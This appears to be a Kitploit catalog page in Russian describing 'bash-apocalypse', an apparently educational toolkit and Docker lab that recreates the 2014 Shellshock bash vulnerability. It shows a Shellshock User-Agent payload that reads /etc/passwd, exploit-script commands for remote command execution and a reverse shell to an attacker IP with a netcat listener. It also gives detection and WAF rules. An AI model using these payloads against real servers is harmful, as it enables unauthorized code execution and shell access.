Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
bash-apocalypse — Воссоздание Shellshock (CVE-2014-6271) — уязвимости bash, поставившей под угрозу миллионы серверов. Автоматизированный набор эксплойтов + методология Burp Suite + лаборатория Docker. Создано для исследований в области безопасности и обучения. Портфолио-проект по наступательной безопасности. | Kitploit
Инструменты/GitHubGitHub/mtaha-sec/bash-apocalypse
Сканеры уязвимостейГенерация полезной нагрузкиЭксплуатацияОбход IDS/IPSШелл-кодЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеНеправильная Конфигурация

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Обучение и Образование
Лаборатории и Практика
GitHubmtaha-sec/bash-apocalypse

bash-apocalypse

Репозиторий
1 месяц назадЕщё не проверено

Описание

Воссоздание Shellshock (CVE-2014-6271) — уязвимости bash, поставившей под угрозу миллионы серверов. Автоматизированный набор эксплойтов + методология Burp Suite + лаборатория Docker. Создано для исследований в области безопасности и обучения. Портфолио-проект по наступательной безопасности.

Поделиться

Bash Apocalypse

Автоматизированный инструментарий для эксплуатации CVE-2014-6271 (Shellshock)

Severity CVSS Score

Полноценный исследовательский проект в области безопасности, демонстрирующий уязвимость Shellshock, которая в 2014 году затронула миллионы серверов. Включает автоматическое сканирование, возможности эксплуатации и рекомендации по защите.

Demo


Что такое Shellshock?

Shellshock (CVE-2014-6271) — критическая уязвимость в командной оболочке Bash, позволяющая удалённо выполнять код путём манипуляции переменными окружения. Обнаруженная в 2014 году после 22 лет существования, она затронула миллионы систем Unix/Linux по всему миру.

Как это работает:

root@kitploit:~
# Normal: Bash exports functions as environment variables
my_function='() { echo "hello"; }'

# The bug: Bash continues parsing after the function definition
exploit='() { :;}; echo "PWNED"'  # The second command executes

Веб-серверы, использующие CGI, передают HTTP-заголовки в Bash как переменные окружения, что делает их уязвимыми:

root@kitploit:~
User-Agent: () { :;}; echo; /bin/bash -c 'cat /etc/passwd'

Быстрый старт

root@kitploit:~
# Clone and setup
git clone https://github.com/YOUR-USERNAME/bash-apocalypse.git
cd bash-apocalypse

# Start vulnerable lab
docker-compose up -d

# Run exploit
chmod +x exploit.sh
./exploit.sh --url http://localhost:8080/cgi-bin/test.cgi --cmd "whoami"

Возможности

Автоматический сканер

  • Обнаруживает уязвимые CGI-эндпоинты
  • Проверяет несколько точек инъекции (User-Agent, Referer, Cookie)
  • Поддержка пользовательских словарей (wordlist)

Инструмент эксплуатации

  • Выполнение команд с захватом вывода
  • Автоматический reverse shell
  • Несколько вариантов полезной нагрузки

Лабораторная среда

  • Настройка Docker одной командой
  • Изолированный уязвимый сервер
  • Безопасная среда для тестирования

Использование

Сканирование на уязвимости

root@kitploit:~
./exploit.sh --scan --target localhost --port 8080

Выполнение команд

root@kitploit:~
./exploit.sh --url http://target/cgi-bin/test.cgi --cmd "id"

Получение reverse shell

root@kitploit:~
# Terminal 1
nc -lvnp 4444

# Terminal 2
./exploit.sh --url http://target/cgi-bin/test.cgi --reverse-shell YOUR_IP:4444

Ручная эксплуатация (Burp Suite)

Шаг 1: Перехват запроса

Перехват Burp

Шаг 2: Внедрение полезной нагрузки

Эксплуатация

Измените заголовок User-Agent:

root@kitploit:~
User-Agent: () { :;}; echo; /bin/bash -c 'cat /etc/passwd'

Шаг 3: Наблюдение за ответом

Reverse Shell

Сервер выполняет вашу команду и возвращает результат.


Технический анализ

Схема атаки

root@kitploit:~
Client (Attacker)
    │
    │ HTTP Request with malicious User-Agent
    ▼
Web Server
    │
    │ Passes header as environment variable
    ▼
CGI Script
    │
    │ Spawns Bash process
    ▼
Bash Shell
    │
    │ Parses function + executes trailing commands
    ▼
Command Execution (RCE)

Первопричина

Когда Bash встречает определение функции в переменной окружения:

  1. Он разбирает функцию: () { :;}
  2. Ошибка: он продолжает разбор и выполняет всё, что идёт после
  3. Результат: произвольное выполнение команд

Защита

Немедленное устранение

root@kitploit:~
# Update Bash
sudo apt-get update && sudo apt-get upgrade bash

# Disable CGI if not needed
sudo a2dismod cgi && sudo systemctl restart apache2

Обнаружение

root@kitploit:~
# Check logs for exploitation attempts
grep -E "\\(\\)|\\{.*\\}" /var/log/apache2/access.log

Правило WAF

root@kitploit:~
SecRule REQUEST_HEADERS "\\(\\).*\\{" "deny,status:403,msg:'Shellshock Attack'"

Продемонстрированные навыки

  • Тестирование веб-приложений на проникновение
  • Написание Bash-скриптов и автоматизация
  • Манипуляция HTTP-протоколом
  • Контейнеризация Docker
  • Владение Burp Suite
  • Как наступательная, так и оборонительная безопасность

Структура проекта

root@kitploit:~
bash-apocalypse/
├── README.md
├── exploit.sh              # Main tool
├── payloads.txt            # Test payloads
├── docker-compose.yml      # Lab setup
└── screenshots/
    ├── intercept.png
    ├── Payload.png
    └── result.png

Отказ от ответственности

Только в образовательных целях. Тестируйте только те системы, которыми вы владеете или на тестирование которых у вас есть явное разрешение. Несанкционированный доступ противозаконен.


Ресурсы

  • Подробности CVE-2014-6271
  • Cloudflare: внутри Shellshock
  • Практика: HackTheBox - Shocker

Создано, чтобы понять, как работают уязвимости и как защищаться от них. ;)

Скачать инструмент